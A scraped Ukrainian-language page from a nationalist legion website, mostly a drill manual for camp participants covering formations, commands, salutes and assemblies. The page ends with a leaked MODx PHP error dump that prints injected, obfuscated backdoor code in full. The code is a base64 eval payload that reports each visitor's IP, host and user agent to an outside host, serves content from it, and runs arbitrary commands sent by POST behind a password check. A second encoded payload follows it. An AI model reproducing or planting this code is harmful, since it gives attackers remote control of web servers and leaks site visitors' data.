Правильник Впоряду

Український легіон » Дисципліни » Практичні поради » Правильник Впоряду

Використовуючи даний Впоряд, потрібно враховувати наступні принципи:

 • доцільність
 • оперативність
 • мобільність
 • простота
 • зручність

Треба пам`ятати завжди: ВПОРЯД — ЦЕ ЗАСІБ, А НЕ МЕТА.

Для зручності в тексті використовуватиметься термін таборовик, для окреслення особи, що виконує команди (впоряд), а також командир – особа, що відає накази, а також всі особи,  що мають в своєму підпорядкуванні певну кількість таборовиків, і очолюють якісь структурні відділи.

 

Основні поняття впоряду:

ВПОРЯД — звичай, що впорядковує поведінку таборовиків-націоналістів для здійснення спільних завдань. Впоряд вимагає повного підпорядкування командиру в межах визначених команд. Призначений для оперативного і ефективного виконання завдань, отриманих від командира.

ШИКУВАННЯ — процес виконання впоряду в лінію. Є два види шикування: лава і ряд.

ЛАВА  —  шикування, в якому таборовики розташовані один біля одного на одній лінії із проміжками між ліктями шириною в кулак.

ДВОЛАВА, ТРИЛАВА І Т.Д. — дві, три і т.д.паралельно розташовані лави. Відстань між лавами становить довжину витягнутої правої руки першого зправа, покладеної на плече того, що стоїть перед ним.

РЯД — шикування, в якому таборовики розташовані один за одним, на одній лінії і на відстанях довжиною у витягнуту праву руку, покладену на плече того, що стоїть перед ним.

КОЛОНА (ДВОРЯД, ТРИРЯД І Т.Д.) —два (три і т.д.) паралельно розташовані ряди.

Всі команди впоряду в русі починають виконуватись з лівої ноги, окрім означених винятків.

КОМАНДА — встановлений впорядом наказ. Складається з двох підкоманд:

- підготовчу (вказує на зміст команди);

- виконавчу (вимагає негайного і точного виконання всієї команди).

Вирізняємо ще так звану вказівну підкоманду (вказує на таборовика чи відділ, що має виконати наступні команди), також формоутворюючу підкоманду („в дво-, три- лаву, ряд - називає результат команди СТАВАЙ). Команди подаються голосно та виразно. Підготовча команди подаються дещо протяжне, виконавча — коротко і різко. Між поданням підкоманд робляться короткі паузи.

 

Три постави впоряду

1. Основна постава — СТРУН-КО.

На місці в цій поставі:

 • носки розведені на ширину стопи, п'ятки разом;
 • коліна випрямлені, але не напружені;
 • живіт втягнутий, груди підняті, плечі розправлені;
 • руки звисають вільно, долоні згорнуті в кулаки і притиснуті до стегон;
 • голова випрямлена, підборіддя припідняте, очі дивляться вперед;
 • таборовик випрямлений, зосереджений на словах командира і готовий до негайної дії.

У русі в цій поставі — йти в ногу (за додатковою командою: карбувати крок лівою ногою).

З основної постави даються усі команди, окрім команд „До молитви ” і „По молитві”, які подаються на поставу „СПО-ЧИНЬ”. Команда „ЗБІР-КА” дається і виконується незалежно від постави, місцезнаходження та роду занять та боровиків (відділів), до яких звернена команда.

 

2. Постава "спочинь" — приймається на команду СПО-ЧИНЬ. На місці в цій поставі:

 • ліва нога відставлена вліво (на ширину плечей);
 • руки складені за спиною;
 • дозволяється підняти руку (щоб командир надав слово), поправити однострій і виряд.

У русі в цій поставі — йти довільним кроком.

 

3. Постава "свобідно" — приймається на команду СВОБІД-НО.

На місці в цій поставі зберігається стрій, дозволяється говорити і присідати на місці.

 

Головні команди впоряду

1.  ЗБІРКА! – вказаному відділу прибути до місцязнаходження командира для виконання подальших наказів

2.  СТА-ВАЙ - утворити відповідний процес шикування, завершальним етапом якого є основна постава.

Під час шикування:

-  перший стає напроти командира, що подав команду, на відстані двох метрів; інші шикуються ліворуч від нього (в лаву) або позаду нього (в ряд);

-  відстань між роями (чотами і т.д.) одна особа;

-  вищим стати попереду нижчих;

-  командир, що подав команду, займає місце, зручне для керівництва шикуванням.

-  командири, що не подають команд, стають попереду своїх відділів. При шикуванні у дво-, трилави чи ряди за командирами відділів таборовики не шикуються.

3. СТРУН-КО – прийняти основну поставу.

4. СПО-ЧИНЬ – прийняти поставу спочинь.

5. ШИ-КУЙСЬ:

-  в лаві всім, окрім першого, повернути голову вправо (вліво) і вирівняти лад так, щоби бачити груди четвертого, числячи себе першим (праве вухо вище лівого, підборіддя припідняте);

-  в ряді вирівнятися в потилицю сусіда спереду на відстань витягнутої правої руки.

-  при вирівнюванні дозволяється переміщуватись вперед, назад чи в боки.

6. До звіту (на прапор) ГЛЯНЬ – повернути голову у вказаному напрямку, при команді „До звіту ГЛЯНЬ” треба дивитись на місце подання звіту.

7. Прямо ГЛЯНЬ – повернути голову прямо, дивитись прямо перед собою.

8. ВЕР-НИСЬ — прийняти положення, яке було до подання останньої команди.

9. На привітання провідника Слава Україні! — прийняти основну поставу і відповісти: Героям Слава!

10. На привітання провідника Слава! — прийняти основну поставу і тричі відповісти Слава!

11. РОЗ-ХІД — виконати команду "обернись", двома великими стрибками залишити лад з вигуком Слава! і діяти згідно з попередніми наказами провідника.

 

Команди на місці

1. До МОЛИТВИ водночас всім особам чоловічої статі, окрім хорунжих, зняти накриття голови і виконати відповідну молитву.

2. По МОЛИТВІ — одягнути головні убори.

3. Гімн України, Гімн ОУНвиконати відповідний славень в основній поставі.

4. ПРАВО-РУЧ — на каблуку правої і носку лівої ноги повернутися вправо на 90°.

5. ЛІВО-РУЧ, ОБЕР-НИСЬ — на каблуку лівої і носку правої ноги повернутися вліво, відповідно на 90° та 180°.

6. РОЗ-РАХУЙСЬ — починаючи з правокрилового в першій лаві почергово й швидко повернути голову вліво, назвати своє порядкове число (так щоб почув той, що стоїть ліворуч) та повернути голову прямо.

Останньому в першій лаві замість повертання голови:

-  виступити на один крок;

-  голосно сказати "розрахунок закінчено" і назвати своє число;

-  вступити до ладу.

7.            До других (третіх і т.д.) чисел РОЗ-РАХУЙСЬ - починаючи з першого в першій лаві почергово й швидко повернути голову вліво, назвати своє число (так, щоб почув той, що стоїть ліворуч) та повернути голову прямо;

Останньому в першій лаві замість повертання голови:

-  виступити на один крок;

-  голосно сказати "розрахунок закінчено";

-  вступити до ладу.

 

8. В дволаву СТА-ВАЙ (з однолави)—другим числам лівою ногою зробити крок назад та правою ногою крок вправо, стати позаду перших чисел і приставити ліву ногу.                                         

9. В однолаву СТА-ВАЙ (з дволави) — другим числам зробити лівою ногою крок вліво та правою ногою крок вперед, стати на лінії перших чисел і приставити ліву ногу.                      

10. В трилаву СТА-ВАЙ (з однолави):

-   першим числам зробити правою ногою крок вперед та лівою ногою крок вліво, стати попереду других чисел і приставити праву ногу.

-   третім числам зробити лівою ногою крок назад та правою ногою крок вправо, стати позаду других чисел і приставити ліву ногу.                                                                                                            

11. В однолаву СТА-ВАЙ (з трилави):

- першим числам зробити правою ногою крок вправо та лівою ногою крок назад, стати на лінії других чисел і приставити праву ногу;

- третім числам зробити лівою ногою крок вліво та правою ногою крок вперед, стати на лінії других чисел і приставити ліву ногу.                                                                                          

12. В дворяд СТА-ВАЙ — другим числам зробити  правою ногою крок праворуч та лівою ногою крок вперед, стати на лінії перших чисел і приставити праву ногу.                                                    

13. В одноряд СТА-ВАЙ (з дворяду) — другим числам зробити правою ногою крок назад та лівою ногою крок вліво, стати позаду перших чисел і приставити праву ногу.                                            

14. В триряд СТА-ВАЙ:

-   першим числам зробити правою ногою крок вправо та лівою ногою крок назад, стати на лінії других чисел і приставити праву ногу.

-   третім числам зробити лівою ногою крок вліво та правою ногою крок вперед, стати на лінії других чисел і приставити ліву ногу.

                                                                                                      

15. В одноряд СТА-ВАЙ (з триряду):

- першим числам зробити правою ногою крок вперед та лівою крок вліво, стати попереду других чисел і приставити праву ногу.

- третім числам зробити лівою крок назад та правою зробити крок вправо, стати позаду других чисел і приставити ліву ногу.                                                                                                    

16. Вправо (вліво, від середини) РО-ЗІМКНИСЬ чи Вправо (вліво, від середини) на певну кількість кроків РО-ЗІМКНИСЬ (бігом РО-ЗІМКНИСЬ)

Якщо інтервал не вказано — розімкнення здійснюється на один крок.

При розімкненні від середини вказується, хто середній. Названий середнім, почувши своє псевдо, відповідає: я!


17. Вправо (вліво, до середини) —ЗІМ-КНИСЬ (бігом —ЗІМ-КНИСЬ) — всім, за винятком того, до кого проводиться зімкнення, переміститись на встановлений інтервал та в міру зімкнення самостійно зупинитись.

Команди в русі

 • ХОДОМ (БІГОМ) РУШ — з лівої ноги почати відповідний рух.
 • НА МІСЦІ — зробити ще один крок і з лівої ноги рухатись на місці у звичному темпі.
 • НА МІСЦІ, СТІЙ! —  зробити ще один крок лівою ногою, потім правою і, приставивши до неї ліву, прийняти основну поставу. У паузі між першою і другою частиною команди зімкнутись та вирівняти шикування.
 • · БІ-ГОМ (ХО-ДОМ) — зробити ще один крок і з лівої ноги перейти на біг (ходу).
 • · ПРАВО-РУЧ (ЛІВО-РУЧ) — зробити ще один крок і з лівої (правої) ноги на носках ніг повернутися вправо (вліво) на 90°.
 • · ОБЕР-НИСЬ — зробити ще один крок лівою ногою і занести праву ногу за ліву, обернутись на носках ніг на 180° і з лівої ноги продовжити рух.
 • · ВПРА-ВО (ВЛІ-ВО) ЗАХОДЬ — першому заходити вправо (вліво) на 90° іншим йти за ним.
 • ВПРА-ВО (ВЛІ-ВО) ПРИЙМИ (команда подається під час руху на автошляхах) — всьому шикуванню одночасно зробити кілька кроків (вправо) вліво (без повороту) до краю правого (лівого) узбіччя і продовжувати рух у попередньому напрямку.
 • В ДВОРЯД СТА-ВАЙ (з одноряду):

- першому йти півкроком;

- другим числам вийти вправо і в ритм кроку зайняти свої місця в дворяді.

 • В ОДНОРЯД СТА-ВАЙ (з дворяду):

- першому йти повним кроком, а решті — півкроком;

- в міру звільнення місця, другим числам в ритм кроку зайти поза перші та продовжувати рух повним кроком.

Розімкнення і зімкнення шикувань в русі здійснюється на команди й в порядку, як на місці. 

 

Звертання, звіти, накази

1. Для звертання до командира потрібно запитати "Друже ройовий, дозвольте звернутись ".  У випадку згоди командира почати спілкування.

2. ЗВІТ з місця — подати звіт (особистий чи звіт відділу) командиру з місця свого знаходження.

3. ЗВІТ – виступити з лави, найкоротшим шляхом стати за 2 метри від командира, подати відповідний звіт.

4. ВИСТУПИТИ – вийти з лави (ряду) на крок вперед.

5. ВСТУПИТИ — обернутись в потрібному напрямі і вступити на своє місце.

6. ВИЙТИ З ЛАВИ –  зробити три кроки вперед і обернутися на 180°, стати обличчям до лави.

7. СТАТИ НА МІСЦЕ – зробити три кроки вперед і обернутися на 180°, зайняти своє місце у лаві

8. Якщо до таборовика звертається командир, то на знак готовності отримати наказ таблровик виголошує „Я!”

9. Після того, як таборовик чи командир відповідного відділу отримав наказ від вищого командира на знак розуміння і негайного виконання наказу виголошується „ТАК Є!”

 

 Ранкова та вечірня збірки


На ранковій та вечірній збірках в таборі подаються наступні команди, відповідно до особливостей та традицій відкриття  (закриття) табору або дня. Загальна програма вечірньої збірки є порядком на виворіт від ранішньої; збірка починається звітом, опісля йде спущення прапорів, відтак молитва і заключний звіт. При вечірній збірці немає відчитання наказу, також під час спущення прапорів виконується гімн України.

-  ТАБІР! В однолаві (по роях) СТА-ВАЙ, ШИ-КУЙСЬ, СТРУНКО!;

-  Ройові (чотові) ЗВІТпідійти до командира і зупинившись на відстані трьох кроків подати звіт.

Командири відділів перед звітом вищому командиру попередньо подають команду До звіту ГЛЯНЬ!.

Для подання звіту прийняти основну поставу та привітатись гаслом Слава Україні!

Після відповіді командира Героям Слава! подається:

-  звіт відділу (подає відповідний командир), наприклад, Друже бунчужний, рій число один в повному складі за вашим наказом вишикуваний, доповідав ройовий Зірвиголова. 

Звітуючий:

-  уважно вислуховує командира, відповідає на його питання, отримує наказ;

-  після наказу командира звітуючий говорить слово Так є!, стає в лад, дає відділу команду Прямо

ГЛЯНЬ, СПО-ЧИНЬ.

Табір, до звіту ГЛЯНЬ; 

Слава Україні! Друже коменданте, табір за вашим наказом вишикуваний, доповідав бунчужний Капкан (після цього бунчужний отримує наказ на проведення відкриття дня/табору);

Прямо ГЛЯНЬ, До МОЛИТВИ, По МОЛИТВІ; 

Хорунжі, винести ПРАПОРИ, Табір СТРУН-КО, На прапори ГЛЯНЬ (хорунжі несуть прапори повз шикування до щогли, якщо табір мандрівний – хорунжі займають місце по лівий бік від коменданта);

-   Прямо ГЛЯНЬ, СПО-ЧИНЬ, хорунжі РОЗГОРНУТИ ПРАПОРИ (хорунжі розгортають прапори, чіпляють до щогли), СТРУН-КО, Гімн ОУН (хорунжі піднімають прапори), СПО-ЧИНЬ, хорунжі СТАТИ НА МІСЦЕ (хорунжі вступають на своє місце найкоротшим шляхом),

- Писар, відчитати НАКАЗ (писар виступає на лінію бунчужного по лівий бік від нього), Табір СТРУНКО, (писар читає заголовок денного наказу), СПО-ЧИНЬ (писар відчитує наказ), СТРУНКО (писар відчитує заключення наказу), СПО-ЧИНЬ (писар вступає на своє місце);

Табір, СТРУН-КО, До звіту ГЛЯНЬ;

Слава Україні! Друже коменданте, відкриття дня за вашим наказом проведено, доповідав бунчужний Капкан (отримує наказ стати в лаву, після чого слово має комендант: Слава Україні!)

- Прямо ГЛЯНЬ, РОЗХІД

 

Сигнали свистком:

ЗБІРКА:

“—.-.—.-.” — чергування довгих і коротких свистків.

ЗБІРКА РОЙОВИХ (ЧОТОВИХ):

“— “ — один довгий свисток.

СПОЛОХ (АЛЯРМ):

- - - - - -” — багато коротких свистків.

Крім цих сигналів на кожному таборі можуть вводитись свої, додаткові.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0156 s(22 Requests)
  PHP: 0,4522 s 
  Total: 0,4679 s